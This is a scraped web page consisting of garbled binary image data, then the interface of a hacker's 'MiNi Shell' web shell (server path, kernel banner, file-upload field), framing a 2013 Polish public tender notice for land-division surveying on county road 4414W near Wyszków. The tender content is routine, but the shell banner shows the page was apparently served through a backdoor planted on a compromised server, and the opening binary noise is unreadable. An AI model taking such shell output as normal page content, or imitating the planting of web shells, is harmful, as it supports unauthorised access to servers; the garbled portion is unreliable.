JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130702/130301-N-2013.html

<p class="kh_header"><b>Wyszków: Opracowanie projektu podziału nieruchomości przeznaczonych na realizację inwestycji pn. Budowa drogi powiatowej nr 4414W na odcinku Wyszków - Rybno - Kręgi - Somianka</b><br>
<b>Numer ogłoszenia: 130301 - 2013; data zamieszczenia: 02.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Wyszkowskiego , al. Róż 2, 07-200 Wyszków, woj. mazowieckie, tel. 029 7420750, faks (029) 742 25 10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-wyszkowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektu podziału nieruchomości przeznaczonych na realizację inwestycji pn. Budowa drogi powiatowej nr 4414W na odcinku Wyszków - Rybno - Kręgi - Somianka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa polegająca na opracowaniu projektu podziału nieruchomości przeznaczonych na realizację inwestycji pn. Budowa drogi powiatowej Nr 4414W na odcinku Wyszków - Rybno - Kręgi - Somianka, w celu wydania decyzji o zezwoleniu na realizację inwestycji drogowej (art. 11 a ust. 1 ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych).
2.Do Wykonawcy zamówienia należeć będzie:
1)sporządzenie projektów podziału nieruchomości niezbędnych do złożenia wniosku o wydanie decyzji na realizację inwestycji drogowej w trybie ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych;
2)w przypadku gdy będzie to konieczne - sporządzenie wykazów synchronizacyjnych; 
3.Projekt podziału nieruchomości należy opracować zgodnie z projektem budowlanym sporządzonym przez Egis Poland Sp. z o.o., ul Puławska 182, 02-670 Warszawa, dotyczącym zadania inwestycyjnego pn. Budowa drogi powiatowej Nr 4414W na odcinku Wyszków - Rybno - Kręgi - Somianka. Operat podziałowy należy opracować w oparciu o oględziny i pomiary nieruchomości, aktualne mapy ewidencyjne, wypisy z rejestru gruntów oraz aktualne protokoły badania ksiąg wieczystych działu I i II. Ponadto należy sporządzić  i doprowadzić do zgodności treść mapy ewidencyjnej gruntów z aktualnym stanem prawnym.
4.Projekt podziału nie obejmuje zakresu wykonanego przez Egis Poland Sp. z o.o. (65 podziałów). Należy wykonać projekt podziału dla 217 działek. 
5.Projekty podziału nieruchomości powinny zawierać w szczególności następujące dokumenty:
1)nazwę jednostki ewidencyjnej, oznaczenie obrębu i numer arkusza mapy,
2)adres nieruchomości podlegającej podziałowi,
3)skalę mapy,
4)granice nieruchomości podlegające podziałowi,
5)oznaczenie nieruchomości podlegającej podziałowi według danych z katastru nieruchomości oraz księgi wieczystej, a w razie jej braku - według innych dokumentów określających stan prawny nieruchomości,
6)oznaczenie nieruchomości sąsiednich według danych z katastru nieruchomości,
7)powierzchnię nieruchomości podlegającej podziałowi oraz przedstawione w kolorze czerwonym powierzchnie projektowanych do wydzielenia działek gruntu,    
8)wykaz wywłaszczeniowy,
9)aktualne wypisy i protokoły z badania ksiąg wieczystych I i II działu lub inne dokumenty potwierdzające prawo własności nieruchomości,
10)aktualne wypisy z rejestru ewidencji gruntów,
11)operat pomiarowy podziału nieruchomości wraz z przygotowanym do podpisu wnioskiem skierowanym do Powiatowego Ośrodka Dokumentacji Geodezyjnej celem nadania klauzuli,
12)wykazy synchronizacyjne dla poszczególnych działek w przypadku wystąpienia różnic między księgą wieczystą, a ewidencją gruntów,
13)zbiorczą mapę podziałową w ilości 9 egzemplarzy w wersji papierowej i 1 egzemplarz w wersji cyfrowej (płyta DVD),
14)niezbędne do projektu podziału nieruchomości elementy zagospodarowania terenu, a w szczególności: ogrodzenia, budynki, obiekty małej architektury, studnie szamba, przyłącza, drzewa stanowiące pomniki przyrody, elementy sieci uzbrojenia terenu przebiegające przez nieruchomość podlegającą podziałowi.
6.Zamawiający wymaga, aby Wykonawca udzielił rękojmi za wady projektu podziału nieruchomości i pozostałych usług geodezyjnych na okres 1 roku od daty odbioru końcowego. W okresie rękojmi Wykonawca na wezwanie Zamawiającego zobowiązany będzie między innymi do nieodpłatnego usunięcia wszelkich wad, błędów w dostarczonej dla Zamawiającego dokumentacji geodezyjnej oraz do usunięcia wszelkich usterek stwierdzonych przez organ kontrolujący złożony operat z podziałem działek celem nadania klauzuli. Czynności te Wykonawca wykona w terminie wyznaczonym przez Zamawiającego.
7.Projekt podziału nieruchomości należy sporządzić dla działek wymienionych w załączniku nr 7 do SIWZ.
A. Ustalenia ogólne
Głównym celem, dla którego ma służyć opracowanie jest uzyskanie decyzji zrid Starosty Powiatu Wyszkowskiego na budowę drogi powiatowej Nr 4414W na odcinku Wyszków - Rybno - Kręgi - Somianka.
B. Materiały wyjściowe
1.Mapa w skali 1:1000 przedstawiająca proponowany przebieg drogi z zaznaczeniem terenu niezbędnego dla obiektów budowlanych oraz istniejące i projektowane uzbrojenie terenu.
2.Mapy podziałowe sporządzone w ramach opracowanego projektu budowy DR Nr 4414W.  
C. Ogólne wymagania dotyczące prac
1.Opracowywana dokumentacja powinna odpowiadać wymogom:
1)ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (tekst jednolity Dz. U. z 2008 r. Nr 193, poz. 1194 z późn. zmianami);
2)ustawy z dnia 21 marca 1985 r. o drogach publicznych (tekst jednolity Dz. U. z 2007 r. Nr 19 poz. 115 z późn. zmianami);
3)ustawy z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (teks jednolity Dz. U. z 2005 r. Nr 240, poz. 2027 z późn. zmianami);
4)ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (tekst jednolity Dz. U. z 2004 r. Nr 261, poz. 2603 z późn. zmianami);
5)rozporządzenia Rady Ministrów z dnia 07 grudnia 2004 r. w sprawie sposobu i trybu dokonywania podziałów nieruchomości (Dz. U. Nr 268, poz. 2663);
6)rozporządzenia Ministra Rozwoju Regionalnego i Budownictwa z dnia 29 marca 2001 r. w sprawie ewidencji gruntów i budynków (Dz. U. Nr 38, poz.454 z późn. zmianami).
7)rozporządzenia Ministra Spraw Wewnętrznych (Dz. U. Nr 263 z 2011 r. poz. 1572) w sprawie standardów technicznych wykonywania geodezyjnych pomiarów sytuacyjnych i wysokościowych oraz opracowywania i przekazywania wyników tych pomiarów do państwowego zasobu geodezyjnego i kartograficznego.
8)Wytycznych technicznych dotyczących opracowania (redakcji) mapy z projektem podziału nieruchomości niezbędnej do przygotowania i realizacji inwestycji w zakresie dróg publicznych.
2.Opracowana dokumentacja powinna być kompletna, co oznacza, że powinna zawierać wszystkie materiały geodezyjne, prawne do wystąpienia z wnioskiem o wydanie decyzji zrid.
3.W razie wystąpienia jakichkolwiek wątpliwości Wykonawca winien na roboczo, celem ich omówienia kontaktować się z Wydziałem Inwestycji i Dróg Publicznych Starostwa Powiatowego w Wyszkowie, Aleja Róż 2, tel 29-743-59-06. 
D. Zakres opracowania i skład dokumentacji dla Zamawiającego
Dokumentacja geodezyjno - prawna do nabycia z mocy prawa nieruchomości niezbędnych pod budowę drogi powiatowej Nr 4414W na odcinku Wyszków - Rybno - Kręgi - Somianka, wydzielonych liniami rozgraniczającymi (podziały nieruchomości).
1.Wstępne prace poprzedzające dokonanie podziałów nieruchomości:
1)analiza istniejącej granicy pasa drogowego wykazanej w projekcie (czyli map do celów projektowych) - Wykonawca zobowiązany jest do jej sprawdzenia i w razie rozbieżności zobowiązany jest do uaktualnienia treści na mapie sytuacyjnej wysokościowej, która będzie załącznikiem w materiałach do wniosku o wydanie decyzji zrid;
2)na podstawie zwymiarowania projektowanych granic zajęcia terenu dokonanego przez Projektanta Wykonawca wykonuje analityczne opracowanie właściwego projektu podziału nieruchomości (określając współrzędne punktów granicznych i powierzchnie działek) i opracuje mapy z projektem podziału:
a)Wykonawca wykorzystując zwymiarowanie granic zajęcia terenu dokonane przez Projektanta, zobowiązany jest do takiego ustalenia punktów załamania granicy wyznaczającej pas drogowy, które stanowić będzie wypadkową procesu aproksymacji (generalizacji) granicy ustalonej przez Projektanta i uwzględnienia sytuacji terenowej oraz układu granic na mapie ewidencyjnej;
b)Wykonawca zobowiązany jest przestrzegać zasady, by punkty załamania granic podziału projektować w miejscach o podwyższonej gwarancji ich utrzymania (np. miedze);
c)Wyznaczając granice podziału działek Wykonawca w miarę możliwości winien unikać sytuacji stwarzania działek o bardzo małej powierzchni, której powstanie byłoby jedynie wynikiem niewskazanej w takim przypadku precyzyjności i ścisłości przyjęcia zwymiarowania dokonanego przez Projektanta.  
3)Punkty załamania projektowanych granic pasa drogowego powinny być wykazane przez Wykonawcę, w uzgodnieniu z koordynatorem prac ze strony Zamawiającego, w załączniku mapowym oraz w formie wykazu współrzędnych;
2.Badanie stanu prawnego dzielonych działek i załączenie dokumentów własności. Gdy nieruchomość ma założoną księgę wieczystą należy przeprowadzić badanie hipoteczne I i II działu, a do dokumentacji należy załączyć 2 egz.:
a)badanie stanu prawnego powinno dotyczyć działki dzielonej wchodzącej w zakres inwestycji z podaniem jej powierzchni wynikającej z dokumentów znajdujących się w księdze;
b)w przypadku gdy w wypisie w ewidencji gruntów jest wykazany tylko akt notarialny lub błędnie wpisana KW należy ustalić prawidłową księgę i wykonać badanie hipoteczne;
c)w przypadku gdy nie jest założona księga wieczysta, to należy uzyskać kopię tytułu własności.
3. Opracowanie projektów podziału nieruchomości, wchodzących w zakres pasa drogowego, niezbędnych do nabycia z mocy prawa na podstawie decyzji zrid:
1)wyznaczenie projektowanych granic pasa drogowego w terenie na działkach dzielonych, poprzez zamarkowanie nowych punktów granicznych za pomocą palików; 
2)sporządzenie w 9-ciu egzemplarzach map projektu podziału, w oparciu o obowiązujące przepisy wymienione w punkcie C, oddzielnie dla każdego obrębu ewidencyjnego, opatrzonych stosowną pieczęcią powiatowego ośrodka dokumentacji geodezyjnej i kartograficznej;
4. W wyniku podziału powstałe punkty graniczne, zlokalizowane na załamaniach linii rozgraniczających teren inwestycji drogowej, podlegają wyznaczeniu na gruncie i utrwaleniu granicznikami (słupkami betonowymi).
 E. Szata graficzna
Dokumentację geodezyjno-prawną do nabycia z mocy prawa nieruchomości niezbędnych pod rozbudowę drogi, wydzielonych liniami rozgraniczającymi (podziały nieruchomości) należy skompletować obrębowo, w formacie A-4 i dostarczyć w 9 kompletach, w segregatorach opisanych i zawierających spis zawartości.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 120.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Każda oferta musi być zabezpieczona wadium o wartości 1.000,00 zł (słownie: jeden tysiąc złotych 00/100 ). 
2.Wadium może być wniesione w jednej lub kilku następujących formach:
a)pieniądzu,
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)gwarancjach bankowych,
d)gwarancjach ubezpieczeniowych,
e)poręczeniach udzielanych przez podmioty, o których mowa w art.  6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 
3.Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego w Polski Bank Spółdzielczy w Wyszkowie ul. Kościuszki 5 nr rachunku bankowego 15 8931 0003 0000 9191 2022 0020 z dopiskiem na blankiecie: Projekt podziału nieruchomości przeznaczonych na realizację inwestycji.
4.Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości, należy złożyć w formie oryginału w Sekretariacie Zamawiającego. Oryginał będzie do odbioru po podpisaniu Umowy z wybranym wykonawcą.
5.Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.
6.Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert.
7.Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
8.Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
9.Dyspozycję w zakresie zwrotu wniesionych w pieniądzu wadiów wykonawców, zamawiający przekaże do banku niezwłocznie po:
a)wyborze najkorzystniejszej oferty,
b)zawarciu z Wykonawcą umowy w sprawie zamówienia publicznego i wniesieniu zabezpieczenia należytego wykonania tej umowy,
c)unieważnieniu postępowania o udzielenie niniejszego zamówienia publicznego. 
10.Zamawiający niezwłocznie dokona zwrotu wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11.Wadium wykonawcy, którego oferta została wybrana, zostanie zatrzymane wraz z odsetkami w przypadku, gdy wykonawca:
a)odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)nie wniesie wymaganego zabezpieczenia należytego wykonania umowy,
c)zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie wykonawcy.
12.Wadium wniesione w pieniądzu, Zamawiający przechowa na rachunku bankowym i zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać wiedzę i doświadczenie do wykonania tego zamówienia tj. wykazać, że wykonał w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum jedną usługę odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot zamówienia, tj. wykonał opracowanie dokumentacji niezbędnej do wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej w oparciu o ustawę z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych, (Dz. U Nr 80, poz. 721 z późn. zm.), w której wykonano co najmniej 50 podziałów działek, z podaniem ich wartości, przedmiotu, daty wykonania i odbiorców oraz załączeniem dowodów potwierdzających, że usługi zostały wykonane należycie. 
Ocena tego warunku będzie dokonana wg formuły spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia, czyli co najmniej jedną osobą posiadającą wymagane uprawnienia zawodowe (świadectwa) w dziedzinie geodezji i kartografii nadane przez Głównego Geodetę Kraju, w zakresie określonym w art. 43 ust. 2 ustawy z dnia 17 maja 1989 r. - Prawo geodezyjne i kartograficzne (Dz. U. z 2005 r. nr 24 poz. 2027) rozgraniczenia i podziały nieruchomości oraz sporządzanie dokumentacji do celów prawnych.
Ocena tego warunku będzie dokonana wg formuły spełnia-nie spełnia, na podstawie oświadczeń i dokumentów dołączonych przez wykonawcę do oferty, określonych szczegółowo w SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, a w szczególności musi dysponować środkami finansowymi niezbędnymi do realizacji zamówienia.
Ocena tego warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz oferty - załącznik Nr 1 do SIWZ.
2.Dowód wpłaty wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
